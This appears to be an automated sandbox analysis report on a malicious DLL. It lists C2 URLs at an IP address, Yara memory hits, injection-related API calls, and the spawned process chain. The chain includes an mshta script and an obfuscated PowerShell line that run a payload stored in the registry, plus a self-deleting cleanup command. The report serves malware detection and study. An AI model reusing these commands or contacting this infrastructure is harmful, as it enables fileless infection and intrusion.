Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/ |
Source: rundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGm |
Source: rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOf |
Source: rundll32.exe, 00000003.00000003.403377940.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393803385.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.403395449.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393793161.0000000002E03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2 |
Source: rundll32.exe, 00000003.00000003.393793161.0000000002E03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/sfsR2EvFJVPpjzK/_2F3BoHT0GZYMOPHQ3/2aosaOv_2/FvhUxykM9XmRrxizW8RT/ |
Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: explorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi |
Source: explorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr |
Source: Yara match | File source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR |
Source: Yara match | File source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C7190C GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C76D0A NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C74321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C784C1 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB74AE NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CBC431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC0782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC00DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CCA806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC61AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC2331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB64C4 memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB36BB NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CBB7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CBD77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB10C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC3829 NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC7950 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CCEAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC5220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC5312 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError, |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll" |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Exhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Exhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP" |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: explorer.exe, 00000019.00000000.509234850.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 00000019.00000000.476427259.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647& |
Source: explorer.exe, 00000019.00000000.496672719.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000019.00000000.490287156.000000000820E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00 |
Source: explorer.exe, 00000019.00000000.505272751.00000000062C4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 00000019.00000000.498968199.0000000004287000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0 |
Source: rundll32.exe, 00000003.00000003.403411148.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.403462747.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501461049.0000000002E21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: explorer.exe, 00000019.00000000.490287156.000000000820E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: explorer.exe, 00000019.00000000.509234850.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 00000019.00000000.490287156.000000000820E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00l |
Source: rundll32.exe, 00000003.00000003.403411148.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501461049.0000000002E21000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWD |
Source: mshta.exe, 0000000D.00000003.410851238.000001C7D9B50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}n |
Source: explorer.exe, 00000019.00000000.462244926.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.476444005.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.496655082.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^ |
Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.503922140.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.490134138.00000000080ED000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd |
Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.476899284.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.497029155.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman |
Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.476899284.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.497029155.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock |
Source: explorer.exe, 00000019.00000000.476464537.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.462256144.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.496672719.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4 |
Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.476899284.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.497029155.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager |
Source: Yara match | File source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR |
Source: Yara match | File source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |